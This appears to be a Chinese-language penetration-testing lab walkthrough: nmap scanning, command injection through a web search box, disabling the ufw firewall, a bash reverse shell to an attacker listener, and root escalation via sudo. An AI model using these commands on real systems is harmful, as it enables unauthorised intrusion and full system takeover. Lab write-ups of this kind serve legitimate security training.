一、信息收集
1.查看MAC地址
2.主机扫描
3.端口扫描
nmap -A -v -T4 192.168.172.176 -p 1-65535
发现只有8080端口开放
4.目录扫描
扫出来挺多一会儿尝试利用
二、内网渗透
访问8080端口
点击manager webapp会出现一个弹框
尝试弱口令,登陆失败
查看扫出的目录,查看有没有密码账号信息,发现一个搜索框
测试发现可以进行命令执行,查看home目录下的文件
ls -la /home
弹出账号信息
可以执行命令,但是尝试反弹shell失败
看一下进程,发现有ssh,之前没有扫到,可能是因为防火墙
ps aux
ls -la /etc
查看一下/etc发现防火墙是存在的
利用命令关闭
ssh bill@localhost sudo ufw disable
二、GetShell
再次反弹shell,kali监听
nc -lvvp 4444
执行语句
ssh bill@localhost bash -i >& /dev/tcp/192.168.172.131/4444 0>&1
监听成功
三、提权
sudo -l
发现显示all,可以在任何主机上以任何用户身份执行任何命令
sudo su
python3 -c 'import pty;pty.spawn("/bin/bash")'
提权成功